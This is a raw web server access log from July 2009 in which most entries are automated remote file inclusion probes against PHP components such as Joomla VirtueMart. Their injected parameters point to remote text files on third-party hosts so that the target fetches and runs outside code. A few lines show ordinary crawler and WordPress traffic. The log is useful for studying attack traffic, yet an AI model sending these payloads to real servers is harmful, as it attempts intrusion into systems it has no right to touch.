211.43.202.66 - - [26/Jul/2009:10:58:46 -0700] "GET /logs/access_090415.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:10:58:46 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:10:59:19 -0700] "GET /logs/access_081110.log%20%20//playing.php/common/db.php?commonpath=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.103.16.12 - - [26/Jul/2009:10:59:22 -0700] "GET /logs/index.php?pag=http://rotelle.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.103.16.12 - - [26/Jul/2009:10:59:22 -0700] "GET /logs/access_080615.log%20%20/index.php?pag=http://rotelle.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:10:59:23 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:10:59:31 -0700] "GET /logs/access_090408.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:10:59:32 -0700] "GET /logs/access_090408.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.103.16.12 - - [26/Jul/2009:10:59:38 -0700] "GET /index.php?pag=http://rotelle.altervista.org/id1.txt? HTTP/1.1" 200 20987 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:10:59:44 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:10:59:44 -0700] "GET /logs/access_090415.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:10:59:44 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:10:59:45 -0700] "GET /logs/access_081119.log%20%20//playing.php/common/db.php?commonpath=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:59:47 -0700] "GET /logs/access_080519.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:10:59:51 -0700] "GET /logs/access_080625.log%20%20//playing.php/common/db.php?commonpath=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:11:00:00 -0700] "GET /logs/access_080413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:11:00:00 -0700] "GET /logs/access_080520.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.103.16.12 - - [26/Jul/2009:11:00:08 -0700] "GET /logs/access_080418.log%20%20/index.php?pag=http://rotelle.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:11:00:18 -0700] "GET /logs/access_090415.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:11:00:22 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:11:00:28 -0700] "GET /logs/access_090415.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [26/Jul/2009:11:00:29 -0700] "GET /logs/access_090408.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:11:00:31 -0700] "GET /logs/access_090418.log%20%20//playing.php/common/db.php?commonpath=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:11:00:46 -0700] "GET /logs/access_090408.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:11:00:57 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:11:00:57 -0700] "GET /logs/access_090415.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:11:00:57 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:11:01:08 -0700] "GET /logs/access_090408.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:11:01:43 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:11:01:43 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:11:01:43 -0700] "GET /logs/access_090415.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.8.100 - - [26/Jul/2009:11:01:49 -0700] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0" 200 1053 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
196.40.58.10 - - [26/Jul/2009:11:02:04 -0700] "GET /themes/default/index.php?main=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [26/Jul/2009:11:02:04 -0700] "GET /logs//themes/default/index.php?main=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [26/Jul/2009:11:02:06 -0700] "GET /logs/access_090127.log//themes/default/index.php?main=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.140.20.212 - - [26/Jul/2009:11:02:07 -0700] "GET /logs/access_080114.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://box.dmon.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:11:02:09 -0700] "GET /logs/access_090223.log%20%20////?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.140.20.212 - - [26/Jul/2009:11:02:13 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://box.dmon.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.76" "www.dmulk.com"
213.140.20.212 - - [26/Jul/2009:11:02:13 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://box.dmon.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.140.20.212 - - [26/Jul/2009:11:02:14 -0700] "GET /logs/access_090106.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://box.dmon.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.40.58.10 - - [26/Jul/2009:11:02:17 -0700] "GET /logs/access_090211.log//themes/default/index.php?main=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:11:02:26 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:11:02:26 -0700] "GET /logs/access_090415.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:11:02:28 -0700] "GET /logs/access_090223.log%20%20////?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:11:02:29 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:11:02:33 -0700] "GET /logs/access_090408.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:11:02:41 -0700] "GET /logs/access_080323.log/?my_ms[root]=http://www.ozin.co.kr/data/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:11:02:41 -0700] "GET /logs/access_080812.log/?my_ms[root]=http://www.ozin.co.kr/data/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:11:02:41 -0700] "GET /logs/access_080812.log/?my_ms[root]=http://www.ozin.co.kr/data/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:11:02:41 -0700] "GET /logs/access_080323.log/?my_ms[root]=http://www.ozin.co.kr/data/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:11:02:41 -0700] "GET /logs/?my_ms[root]=http://www.ozin.co.kr/data/oil2.txt?? HTTP/1.1" 200 110055 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:11:02:41 -0700] "GET /logs/?my_ms[root]=http://www.ozin.co.kr/data/oil2.txt?? HTTP/1.1" 200 110055 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:11:02:43 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:11:02:43 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
69.13.208.131 - - [26/Jul/2009:11:02:56 -0700] "GET /logs/access_090412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:11:02:57 -0700] "GET /?my_ms[root]=http://www.ozin.co.kr/data/oil2.txt?? HTTP/1.1" 200 21126 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:11:02:57 -0700] "GET /?my_ms[root]=http://www.ozin.co.kr/data/oil2.txt?? HTTP/1.1" 200 21126 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.58.10 - - [26/Jul/2009:11:03:06 -0700] "GET /logs//themes/default/index.php?main=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [26/Jul/2009:11:03:06 -0700] "GET /logs/access_090127.log%20%20//themes/default/index.php?main=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [26/Jul/2009:11:03:06 -0700] "GET /themes/default/index.php?main=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [26/Jul/2009:11:03:24 -0700] "GET /logs/access_090211.log%20%20//themes/default/index.php?main=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.11.17.16 - - [26/Jul/2009:11:03:30 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.11.17.16 - - [26/Jul/2009:11:03:30 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.11.17.16 - - [26/Jul/2009:11:03:30 -0700] "GET /logs/access_090415.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:11:03:32 -0700] "GET /logs/access_090408.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:11:03:59 -0700] "GET ///?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 200 21022 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:11:03:59 -0700] "GET /logs////?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:11:03:59 -0700] "GET /logs/access_080412.log////?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:11:04:07 -0700] "GET /logs/access_090223.log////?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.11.17.16 - - [26/Jul/2009:11:04:31 -0700] "GET /logs/access_090408.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.110 - - [26/Jul/2009:11:04:51 -0700] "GET /logs/access_070831.log HTTP/1.0" 200 35113 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
141.223.5.11 - - [26/Jul/2009:11:05:12 -0700] "GET /logs/access_090303.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
141.223.5.11 - - [26/Jul/2009:11:05:12 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
141.223.5.11 - - [26/Jul/2009:11:05:12 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
146.48.83.133 - - [26/Jul/2009:11:05:15 -0700] "GET /logs/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
146.48.83.133 - - [26/Jul/2009:11:05:15 -0700] "GET /logs/access_080724.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
146.48.83.133 - - [26/Jul/2009:11:05:15 -0700] "GET /CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
146.48.83.133 - - [26/Jul/2009:11:05:15 -0700] "GET /logs/access_080425.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:11:05:19 -0700] "GET /logs/access_090408.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.47.80.39 - - [26/Jul/2009:11:05:25 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:11:05:26 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.2; http://dmulk.com/blog" "dmulk.com"
64.157.4.41 - - [26/Jul/2009:11:05:27 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
193.47.80.39 - - [26/Jul/2009:11:05:41 -0700] "GET / HTTP/1.1" 200 20934 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
222.236.47.192 - - [26/Jul/2009:11:06:04 -0700] "GET /logs/access_080314.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:06:24 -0700] "GET /CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:06:24 -0700] "GET /logs/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:06:24 -0700] "GET /logs/access_080724.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:06:24 -0700] "GET /logs/access_080425.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:06:39 -0700] "GET /logs/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:06:39 -0700] "GET /logs/access_080724.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:11:06:41 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:11:06:41 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:06:44 -0700] "GET /CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:11:06:44 -0700] "GET /logs/access_080808.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:11:06:49 -0700] "GET /logs/access_080808.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:11:06:49 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:11:06:49 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:06:57 -0700] "GET /logs/access_080724.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:06:57 -0700] "GET /logs/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:07:00 -0700] "GET /CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:11:07:04 -0700] "GET /logs/access_080808.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:11:07:04 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:11:07:04 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:07:06 -0700] "GET /logs/access_080724.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:07:06 -0700] "GET /logs/access_080425.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:07:07 -0700] "GET /CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:07:07 -0700] "GET /logs/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:11:07:09 -0700] "GET /logs/access_090520.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:07:09 -0700] "GET /logs/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:07:09 -0700] "GET /CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:07:09 -0700] "GET /logs/access_080724.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:11:07:13 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 21158 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:11:07:13 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:11:07:15 -0700] "GET /logs/access_080808.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:07:15 -0700] "GET /logs/access_080425.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:11:07:16 -0700] "GET /logs/access_090520.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:11:07:17 -0700] "GET /logs/access_090520.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.137.253 - - [26/Jul/2009:11:07:21 -0700] "GET /logs/access_080425.log/CONFIG[MWCHAT_Libs]=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
